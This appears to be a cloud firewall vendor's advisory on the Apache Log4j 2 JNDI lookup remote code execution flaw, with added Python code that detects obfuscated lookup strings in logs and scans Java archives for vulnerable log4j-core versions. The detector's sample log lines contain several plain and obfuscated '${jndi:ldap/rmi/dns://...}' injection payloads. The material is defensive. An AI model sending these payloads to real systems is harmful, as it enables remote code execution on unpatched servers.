Apache Log4j 2 is a popular Java logging framework that is widely used in business system development.

The Apache Log4j 2 remote code execution (RCE) vulnerability is caused by the Lookup feature, which is enabled by default in affected versions. Lookup resolves placeholders of the form ${prefix:name} and substitutes the resolved value into the log entry. One supported prefix is jndi, which resolves the name through the Java Naming and Directory Interface (JNDI). Because affected versions evaluate these placeholders inside the logged message itself, and not only in the logging configuration, any attacker-controlled string that ends up in a log (for example an HTTP User-Agent header, a form field, or a username) can contain a value such as ${jndi:ldap://attacker-host/object}. Log4j 2 then connects to the attacker's server, and the object reference that the server returns can cause the application to load and instantiate a malicious class, which results in remote code execution.
Note: Cloud Firewall has detected and blocked attacks that exploit this vulnerability.
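The following is an added example, not code from the original page or from Cloud Firewall, that shows how detection of the exploit pattern described above works on log or request data. It normalizes the nested lookup forms that attackers use to hide the string "jndi" (the ${lower:...}, ${upper:...} and ${name:-default} forms, which are real Log4j 2 lookup syntax; other lookup prefixes are left untouched) and then checks for a resolved ${jndi: prefix. The sample access-log lines and IP addresses are constructed for the example.

```python
import re

# Innermost ${...} with no nested "${" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup; Log4j 2 matches the lookup prefix case-insensitively.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body):
    """Resolve one innermost lookup body for the prefixes attackers use to
    hide "jndi". Returns None for anything else so it is left in place."""
    if ":-" in body:                       # ${name:-default} or ${::-j} -> the default value
        return body.split(":-", 1)[1]
    key, _, value = body.partition(":")
    key = key.strip().lower()
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()
    return None


def normalize(text, max_rounds=32):
    """Collapse nested lookups from the inside out, bounded so a pathological
    input cannot loop forever."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


def is_jndi_probe(text):
    """True if the input contains a JNDI lookup, even an obfuscated one."""
    return bool(_JNDI.search(normalize(text)))


def scan_lines(lines):
    """Return (line_number, normalized_text) for every suspicious log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        if is_jndi_probe(line):
            hits.append((n, normalize(line)))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET /" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - "GET /" 200 "${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7/a}"',
    '203.0.113.9 - - "GET /" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/o}"',
    '203.0.113.9 - - "GET /" 200 "${${env:NaN:-j}ndi:dns://198.51.100.7/x}"',
    '203.0.113.5 - - "GET /pay?note=${amount}" 200 "curl/7.79"',
]

if __name__ == "__main__":
    for n, norm in scan_lines(SAMPLE_LOG):
        print("line %d: %s" % (n, norm))
```

Normalizing before matching is what distinguishes a usable rule from a plain "${jndi:" string match: lines 3 to 5 of the sample never contain that literal string, yet each resolves to a JNDI lookup once Log4j 2 evaluates the nested placeholders. The last line shows a benign placeholder that must not trigger the rule.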

Impact scope: Apache Log4j 2.x < 2.15.0-rc2

Risk level: high

Rule-based defense: A virtual patch is available in the Cloud Firewall console to defend against this vulnerability.

Rule type: command execution

Suggestions:
  • Check whether the Apache Log4j 2 JAR file (log4j-core) is imported into your business system, either directly or as a transitive dependency of another component. Also inspect JAR files nested inside fat JARs, WAR and EAR archives, because a shaded copy of log4j-core in those archives is affected in the same way.

    If the dependency is imported into your business system, the vulnerability may exist. Upgrade Apache Log4j 2 to the latest version for your business system.

  • Upgrade all applications and components that are affected by the vulnerability to the latest versions.

    For example, if the spring-boot-starter-log4j2, Apache Struts2, Apache Solr, Apache Druid, or Apache Flink component is affected by the vulnerability, you must upgrade the component to the latest version.

  • Purchase Cloud Firewall Premium Edition or higher.

    You can apply for the 7-day free trial of Cloud Firewall Premium Edition. For more information, see Apply for a free trial of Cloud Firewall.
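The following is an added example, not code from the original page or from Cloud Firewall, that implements the first suggestion above: finding log4j-core in a deployment and deciding whether it falls within the impact scope. It looks for the JndiLookup class and for the Maven pom.properties file that log4j-core ships (both paths are the real ones used by the artifact), recurses into nested archives, and compares the version against the page's threshold of 2.15.0-rc2. The sample JARs are constructed in memory as test fixtures and are not real artifacts.

```python
import io
import os
import zipfile

# Class whose presence marks a log4j-core build with the JNDI lookup compiled in.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped inside log4j-core; carries the artifact version.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 15, 0)  # advisory threshold: 2.x below 2.15.0-rc2 is affected
ARCHIVE_EXT = (".jar", ".war", ".ear")


def parse_version(props):
    """Pull 'version=...' out of pom.properties bytes; None if absent."""
    for line in props.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def is_affected(version):
    """True when a log4j-core version string falls in the advisory's impact scope."""
    core, _, qualifier = version.partition("-")
    nums = tuple(int(p) for p in core.split(".") if p.isdigit())
    if nums < FIXED:
        return True
    # 2.15.0-rc1 predates the page's lower bound of 2.15.0-rc2.
    return nums == FIXED and qualifier.lower() == "rc1"


def inspect_jar_bytes(data, path):
    """Return findings for one archive, recursing into archives nested inside it
    (fat JARs, WAR WEB-INF/lib) so shaded copies of log4j-core are not missed."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = parse_version(zf.read(POM_PROPS)) if POM_PROPS in names else None
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            if version is None:
                status = "unknown-version"   # JndiLookup present but no metadata: treat as suspect
            elif is_affected(version):
                status = "vulnerable"
            else:
                status = "patched"
            findings.append({"path": path, "version": version,
                             "jndi_lookup_present": has_jndi, "status": status})
        for name in names:
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_jar_bytes(zf.read(name), path + "!" + name))
    return findings


def scan_directory(root):
    """Walk a filesystem tree and inspect every archive found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    findings.extend(inspect_jar_bytes(fh.read(), full))
    return findings


def make_sample_jar(version, with_jndi=True, nested_in=None):
    """Build a minimal constructed log4j-core look-alike in memory (test fixture,
    not a real artifact). If nested_in is given, wrap it inside an outer archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\nversion=%s\n" % version)
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    inner = buf.getvalue()
    if nested_in is None:
        return inner
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr(nested_in, inner)
    return outer.getvalue()


if __name__ == "__main__":
    war = make_sample_jar("2.14.1", nested_in="WEB-INF/lib/log4j-core-2.14.1.jar")
    for finding in inspect_jar_bytes(war, "app.war"):
        print(finding)
```

On a real host, call scan_directory on the application and server directories (for example the directory that holds deployed WAR files). A "patched" result means the version is outside this advisory's impact scope only; the suggestion above to upgrade to the latest version still applies.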